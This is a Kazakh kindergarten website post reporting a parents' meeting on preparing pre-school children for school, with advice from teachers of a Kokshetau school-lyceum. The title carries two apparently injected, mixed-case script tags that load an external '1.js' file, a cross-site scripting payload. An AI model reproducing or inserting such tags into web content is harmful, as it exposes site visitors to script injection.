"Балабақшадағы кездесу", ата-аналар жиналысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.05.2024

Ата-аналар жиналысы - балабақшадағы кездесу

(мектепалды топ балаларының ата-аналарына бастауыш сынып мұғалімдерінің ұсыныстары)

«Қуаныш» бөбекжайында 26-сәуір күні «Баланың болашағына жол ашайық!» тақырыбында мектепалды топ ата-аналарына арналған жиналыс өткізілді. Жиналыста ата - аналар Көкшетау қаласының №6 мектеп лицейінің директордың ОТЖ жөніндегі орынбасары Бейсенова Айгерим Жумабековна мен қазақ бастауыш сынып әдістеме бірлестігінің жетекшісі Макишева Алтынай Ахмедиевна. Мектеп пен бөбекжай арасындағы сабақтастық жұмыстар жүргізілгені туралы айтылды.

Сабақтастық мақсаты: екі буын арасындағы тығыз байланыс жасай отырып, баланы жүйелі сатылы дамыту болып табылады. Қазақстанның келешегі - қазақ мектебінде болғандықтан, баланың болашағына алаңдасаңыздар қазақ сыныбына беру абзал екендігі айтып өтілді. Сондай-ақ, мұғалімдер кеңес және ұсыныстар берді. Ата-аналар жиналысы жағымды, жылы ортада өтті. Қатысушылар арасындағы сенімді әрі оңай байланыс орнап, ата-аналар өздерін қызықтырған сұрақтар қойып, әкімшілік пен мұғалімдерден көңілге қонымды жауаптарын алып, ризашылықтарын білдірді.

Просмотров: 845


Пікір қосу



Деректерді қолтаңбаға қосу